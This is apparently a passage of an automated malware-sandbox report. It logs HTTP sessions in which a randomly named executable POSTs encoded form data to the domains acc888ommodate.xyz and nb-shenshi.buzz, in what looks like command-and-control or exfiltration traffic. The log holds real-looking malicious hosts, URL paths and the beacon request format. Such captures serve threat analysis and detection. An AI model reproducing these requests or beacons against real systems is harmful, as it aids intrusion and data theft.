                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 4c 34 41 54 31 67 4d 56 77 4b 73 32 34 79 35 36 6b 30 54 54 53 6f 73 70 33 55 56 67 37 51 77 53 31 47 6e 55 79 50 50 6a 74 52 44 63 73 48 34 47 49 30 31 62 76 50 56 44 7a 39 65 59 39 71 4d 39 2b 36 4b 68 44 6e 68 65 61 48 6f 75 58 6e 6f 4e 31 79 66 67 42 46 53 4c 6b 65 4f 4a 4a 54 69 41 44 62 35 51 54 6e 66 53 2b 52 38 61 61 2f 75 4c 74 70 67 48 57 77 65 73 47 74 68 68 76 46 76 51 34 72 48 6e 53 50 50 43 44 4d 71 6f 38 4d 35 43 44 55 53 73 78 71 70 34 73 70 78 36 47 75 32 56 55 66 7a 53 43 36 70 62 63 71 78 65 41 4e 31 45 55 49 79 6f 69 4e 43 6f 57 71 45 48 37 41 6f 68 63 2b 71 2f 35 53 4e 66 74 43 70 6d 37 4c 4d 79 71 53 5a 35 61 47 63 3d
                                                                                                                                                                                Data Ascii: JZOtU=L4AT1gMVwKs24y56k0TTSosp3UVg7QwS1GnUyPPjtRDcsH4GI01bvPVDz9eY9qM9+6KhDnheaHouXnoN1yfgBFSLkeOJJTiADb5QTnfS+R8aa/uLtpgHWwesGthhvFvQ4rHnSPPCDMqo8M5CDUSsxqp4spx6Gu2VUfzSC6pbcqxeAN1EUIyoiNCoWqEH7Aohc+q/5SNftCpm7LMyqSZ5aGc=
                                                                                                                                                                                Nov 29, 2024 09:17:24.445173979 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:24 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                19192.168.2.449947176.32.38.130801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:25.751926899 CET10892OUTPOST /j1io/ HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 4c 34 41 54 31 67 4d 56 77 4b 73 32 34 79 35 36 6b 30 54 54 53 6f 73 70 33 55 56 67 37 51 77 53 31 47 6e 55 79 50 50 6a 74 52 62 63 73 30 77 47 4c 58 74 62 75 50 56 44 76 74 65 5a 39 71 4d 61 2b 36 69 6c 44 6e 64 6b 61 46 67 75 52 79 6b 4e 67 32 4c 67 55 56 53 4c 6f 2b 4f 49 4e 54 69 56 44 62 70 55 54 6e 50 53 2b 52 38 61 61 2b 2b 4c 37 6f 67 48 55 77 65 6a 46 74 68 39 6b 6c 75 50 34 72 66 5a 53 50 4c 4e 41 38 4b 6f 39 73 70 43 51 57 36 73 35 71 70 2b 72 70 77 35 47 75 37 4e 55 66 66 65 43 35 30 54 63 74 78 65 52 6f 5a 59 45 59 33 72 35 73 69 69 54 72 30 41 79 6a 45 42 53 4d 32 37 36 78 4e 6d 76 6d 68 58 6a 63 35 42 74 7a 46 53 49 6a 79 72 69 4f 77 48 4f 61 4b 6c 56 68 76 74 44 66 47 4d 66 2b 58 6f 72 6e 34 70 31 36 74 78 6d 69 5a 2f 72 74 61 42 78 6c 74 62 35 77 5a 31 56 66 4c 63 79 4d 6a 32 65 7a 7a 64 78 58 45 55 59 33 74 74 46 67 34 31 79 6e 6f 47 6d 6f 6b 6f 42 6a 67 43 4a 43 49 54 53 58 62 61 76 76 62 39 42 46 75 38 57 2b 73 59 46 6a 75 64 30 57 38 6d 6f 38 4a 65 42 52 50 6b [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=L4AT1gMVwKs24y56k0TTSosp3UVg7QwS1GnUyPPjtRbcs0wGLXtbuPVDvteZ9qMa+6ilDndkaFguRykNg2LgUVSLo+OINTiVDbpUTnPS+R8aa++L7ogHUwejFth9kluP4rfZSPLNA8Ko9spCQW6s5qp+rpw5Gu7NUffeC50TctxeRoZYEY3r5siiTr0AyjEBSM276xNmvmhXjc5BtzFSIjyriOwHOaKlVhvtDfGMf+Xorn4p16txmiZ/rtaBxltb5wZ1VfLcyMj2ezzdxXEUY3ttFg41ynoGmokoBjgCJCITSXbavvb9BFu8W+sYFjud0W8mo8JeBRPk46hXXlO80hJzGW/JWSdfI65M/b9ZpK0+CLXOLOjLZxLUJ6uxTNLLLGLxwIXAKg5wthoto3moAubSPlQYN7P3NLkWX0DvBJSIC8FyTUK55B2wAjlTry07BUWGT4+mQQVd0La6F3su3wy7BZsABqxm4IHyJ8+5j6+i8ElSMg5T4DYaUKYli9OM9va5F+9A4QH0V/L4poyqTLnbw66kgLrT+ZCvdED4E/Z3bhW0aiiRqN5GJw0zFNi0Tk3wswrj22J63XHnHjKXRZBd159TpkVhKE/WBujBLO7Ec/HY4J9da4//MoV3g1e/QI6DPwNtnZ+iof/4I4A3MwxnyY5jIga5Fb76+StdS61X2ASjdIYb8DJQYqym7iSr1lVYzW8fePqErk93+zD2sRt5uPdk+QPjrct+d7gdGBVHahvqN7XR+qZyBt3eG6ivdhOW2OCmydXEsPtdzOOs5/q/2sgcgKKNEOFljlpHubtXxVYl64AduT4njJkLMFgw2FW6iWIGIvqHzaue0HvGFROS6ll15u/GjNig/IA9tUamHtUmDKDFarrls0BlyYy3HWRP7mPjEwkRt1nzX5NqGm5EIXBTjYAFhkrwA6Pk2BjqVsDnNEwgU/NQI2aBLAesekasQDmwBM3nCU5K9C7zG8vXIidO7skklb+BgB4z+op7bt [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:17:27.058898926 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:26 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                20192.168.2.449952176.32.38.130801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:28.411917925 CET512OUTGET /j1io/?Tr=kdnPUNSPd0&JZOtU=G6oz2WtW4adnoUNEj0mDd4tA5mRlmRwrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSatVnWojK2LYHm9HZs6Gkfl13sfdd70mrgRKgs= HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:17:29.730864048 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:29 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                21192.168.2.449966161.97.168.245801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:35.359877110 CET781OUTPOST /qrcg/ HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 34 64 69 6e 42 53 6d 6d 73 5a 54 57 38 76 75 46 34 58 43 70 64 2b 65 2b 33 66 31 4d 46 39 4b 43 36 66 76 32 53 63 79 66 46 73 73 44 35 50 74 6f 34 34 6b 6b 2b 47 52 6e 42 54 54 73 43 42 72 32 73 74 44 68 74 43 70 50 6e 74 4f 54 75 47 45 68 64 41 42 49 50 39 79 79 4c 62 37 71 6e 67 33 4b 56 46 46 4b 64 41 55 38 70 33 71 48 34 62 65 65 59 58 54 37 44 58 6d 4f 6d 33 57 32 79 59 4b 4d 36 39 48 6a 72 77 4d 70 34 76 65 57 65 71 6b 2b 65 4b 41 30 64 55 68 51 6d 32 39 65 46 37 37 62 70 5a 72 45 55 74 4f 58 4e 51 5a 31 50 48 57 61 42 63 41 55 74 68 35 71 59 58 37 7a 36 57 50 7a 32 77 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=4dinBSmmsZTW8vuF4XCpd+e+3f1MF9KC6fv2ScyfFssD5Pto44kk+GRnBTTsCBr2stDhtCpPntOTuGEhdABIP9yyLb7qng3KVFFKdAU8p3qH4beeYXT7DXmOm3W2yYKM69HjrwMp4veWeqk+eKA0dUhQm29eF77bpZrEUtOXNQZ1PHWaBcAUth5qYX7z6WPz2w==
                                                                                                                                                                                Nov 29, 2024 09:17:36.629502058 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:36 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: W/"66cd104a-b96"
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                                Nov 29, 2024 09:17:36.629571915 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                22192.168.2.449972161.97.168.245801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:38.034024954 CET801OUTPOST /qrcg/ HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 34 64 69 6e 42 53 6d 6d 73 5a 54 57 39 4f 2b 46 2b 77 57 70 66 65 65 2f 35 2f 31 4d 4f 64 4c 4c 36 66 6a 32 53 59 69 78 46 2b 34 44 34 72 68 6f 71 73 77 6b 7a 6d 52 6e 4f 44 54 74 50 68 71 36 73 74 50 66 74 48 4a 50 6e 75 79 54 75 44 34 68 64 7a 70 4c 64 64 79 30 44 37 37 73 6a 67 33 4b 56 46 46 4b 64 41 41 43 70 33 69 48 37 71 75 65 58 57 54 36 4f 33 6d 4a 6c 33 57 32 34 49 4b 58 36 39 48 56 72 78 51 50 34 73 6d 57 65 75 67 2b 66 62 41 33 4b 6b 68 53 6f 57 38 61 4e 70 2b 49 70 38 47 62 62 4c 57 44 45 6b 74 4d 48 68 62 41 51 74 68 44 2f 68 64 5a 46 51 79 48 33 56 79 36 74 36 31 64 41 51 6f 2f 67 39 32 66 68 55 57 63 55 64 2b 41 49 66 4d 3d
                                                                                                                                                                                Data Ascii: JZOtU=4dinBSmmsZTW9O+F+wWpfee/5/1MOdLL6fj2SYixF+4D4rhoqswkzmRnODTtPhq6stPftHJPnuyTuD4hdzpLddy0D77sjg3KVFFKdAACp3iH7queXWT6O3mJl3W24IKX69HVrxQP4smWeug+fbA3KkhSoW8aNp+Ip8GbbLWDEktMHhbAQthD/hdZFQyH3Vy6t61dAQo/g92fhUWcUd+AIfM=
                                                                                                                                                                                Nov 29, 2024 09:17:39.271941900 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: W/"66cd104a-b96"
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                                Nov 29, 2024 09:17:39.271990061 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                23192.168.2.449977161.97.168.245801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:17:40.698936939 CET10883OUTPOST /qrcg/ HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 34 64 69 6e 42 53 6d 6d 73 5a 54 57 39 4f 2b 46 2b 77 57 70 66 65 65 2f 35 2f 31 4d 4f 64 4c 4c 36 66 6a 32 53 59 69 78 46 2b 41 44 35 65 39 6f 34 62 4d 6b 79 6d 52 6e 49 7a 54 6f 50 68 72 67 73 75 2f 6c 74 48 56 41 6e 6f 2b 54 38 57 30 68 56 69 70 4c 45 74 79 30 42 37 37 74 6e 67 32 51 56 46 31 4f 64 41 51 43 70 33 69 48 37 6f 32 65 54 48 54 36 64 6e 6d 4f 6d 33 57 36 79 59 4c 5a 36 39 66 46 72 78 45 35 35 63 47 57 65 4b 45 2b 59 70 34 33 49 45 68 71 6c 32 38 38 4e 6f 44 51 70 34 6d 58 62 4c 4b 70 45 6a 46 4d 44 47 76 59 41 39 31 75 6c 43 6c 71 48 53 61 67 77 6e 4f 6b 70 35 31 67 50 79 51 63 79 74 32 52 6e 48 76 62 44 38 58 44 58 70 50 69 6c 46 52 6e 6b 71 6b 64 71 37 4f 51 43 65 70 45 43 54 6b 62 6a 7a 4e 57 74 77 6c 44 49 4c 4c 66 61 33 57 4d 51 72 4b 44 30 69 67 30 52 37 58 56 65 4f 42 72 77 32 58 45 73 72 36 74 46 47 51 78 55 6c 65 4f 61 57 61 51 2f 4a 6a 66 4d 49 35 45 45 66 4c 31 62 30 50 56 30 62 44 45 65 33 39 34 61 6e 53 66 45 39 65 48 46 57 2f 36 73 36 37 6e 57 72 2f 2f [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=4dinBSmmsZTW9O+F+wWpfee/5/1MOdLL6fj2SYixF+AD5e9o4bMkymRnIzToPhrgsu/ltHVAno+T8W0hVipLEty0B77tng2QVF1OdAQCp3iH7o2eTHT6dnmOm3W6yYLZ69fFrxE55cGWeKE+Yp43IEhql288NoDQp4mXbLKpEjFMDGvYA91ulClqHSagwnOkp51gPyQcyt2RnHvbD8XDXpPilFRnkqkdq7OQCepECTkbjzNWtwlDILLfa3WMQrKD0ig0R7XVeOBrw2XEsr6tFGQxUleOaWaQ/JjfMI5EEfL1b0PV0bDEe394anSfE9eHFW/6s67nWr//lIOZGJOuKI70v2StRKT6k0SoSF3edW9PPOFKOB2AtCN4MWLhqshNcXvnjs2vjrjtGRdvsSX5UQ/2BC6oSWGJ/gMbena3H6UyGURuteMwFdHQ213BuPDMfZPKX8xCIFEOb69itSSV0kHughyITHDM9P2/ReOnQXX3SJR9xnTNtBPY3N+FgqKB6LFXXXPJl7VGeJdd2lYEW+in0G+l9VKMWDFXA0AKQX/MtfJ+z3mjz4ar23J74t1VBpCYX6y2cTaO3ZEQ2P2vqPNYu+W0Pw0TJ2R62RlVp4dSU3+yn9ZgIUNNXHbCq5Q/Zbbnctt2Ft/dBInvKsolK9jcmifOqjm8xqU3ifq8sQxjSZD4oy+76zPRhxffV4gDMk4fPOQ4LhCcIR9w8K/9hEPo6TMX9LnmdALLSv4CRzxD6bs4CC5CLhhE4PzVVhu2aMrBa8Yspk6cBXkmzZ7hQeqPdrD2TNieDBaZ4PqjCqpbX3+Yqzheh2QvYbTDIRVckz5Nk+kraQjMe+hyH5USru7ep+qGhzcMHxDUQe8f1zvpbR5Ww12fXwEgvEWbsE2sST48DS7J858oYaNrbPr40dFKrJjDeNvqVOmBVs8khmJYXOHzOppOkI31QdG3p54ZnSfYyLKLHgNJ3OJG/xFujgLmLy3KeVwbvmeTfldpzJQIHU [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:17:41.927083969 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:41 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: W/"66cd104a-b96"
                                                                                                                                                                                Content-Encoding: gzip
